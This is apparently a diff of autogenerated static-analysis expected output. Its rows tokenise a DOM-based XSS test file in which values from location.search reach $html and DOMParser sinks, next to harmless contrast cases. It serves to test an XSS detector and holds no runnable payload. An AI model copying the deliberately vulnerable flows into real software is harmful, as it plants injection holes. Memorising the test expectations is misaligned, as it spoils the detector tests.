    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | 'arguments' object of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | 'arguments' object of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | exceptional return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | exceptional return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | exceptional return of anonymous function | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | functio ... } | CalleeFlexibleAccessPath | angular.module().factory().factory().factory().factory().factory().factory().factory().factory | | autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | functio ... } | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | functio ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16762,6 +115905,162 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | functio ... } | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | | autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | functio ... } | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | functio ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:19 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:19 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:19 | this | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:19 | this | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:19 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | 'arguments' object of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | 'arguments' object of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | 'arguments' object of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | exceptional return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | exceptional return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | exceptional return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | functio ... cent" } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | functio ... cent" } | contextSurroundingFunctionParameters | ()\n()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | functio ... cent" } | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | functio ... cent" } | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | functio ... cent" } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:172:20:172:51 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:172:40:172:49 | "innocent" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:172:40:172:49 | "innocent" | contextSurroundingFunctionParameters | ()\n()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:172:40:172:49 | "innocent" | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:172:40:172:49 | "innocent" | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:172:40:172:49 | "innocent" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:176:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:176:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:176:0 | this | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:176:0 | this | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:176:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:181:1 | 'arguments' object of function testDOMParser | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:181:1 | 'arguments' object of function testDOMParser | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:181:1 | 'arguments' object of function testDOMParser | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:181:1 | 'arguments' object of function testDOMParser | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:181:1 | 'arguments' object of function testDOMParser | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:181:1 | exceptional return of function testDOMParser | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:181:1 | exceptional return of function testDOMParser | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:181:1 | exceptional return of function testDOMParser | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:181:1 | exceptional return of function testDOMParser | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:181:1 | exceptional return of function testDOMParser | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:181:1 | functio ... OT OK\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:181:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:181:1 | functio ... OT OK\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:181:1 | return of function testDOMParser | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:181:1 | return of function testDOMParser | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:181:1 | return of function testDOMParser | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:181:1 | return of function testDOMParser | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:176:1:181:1 | return of function testDOMParser | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:176:10:176:22 | testDOMParser | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:176:10:176:22 | testDOMParser | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:176:10:176:22 | testDOMParser | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:177:9:177:14 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:177:9:177:14 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:177:9:177:14 | target | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:177:9:177:14 | target | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:177:9:177:14 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:177:9:177:41 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:177:9:177:41 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:177:9:177:41 | target | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:177:9:177:41 | target | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:177:9:177:41 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:177:9:177:41 | target ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:177:9:177:41 | target ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:177:9:177:41 | target ... .search | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:177:9:177:41 | target ... .search | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:177:9:177:41 | target ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:177:18:177:25 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:177:18:177:25 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:177:18:177:25 | document | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:177:18:177:25 | document | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:177:18:177:25 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:177:18:177:34 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:177:18:177:34 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:177:18:177:34 | document.location | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:177:18:177:34 | document.location | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:177:18:177:34 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:177:18:177:41 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 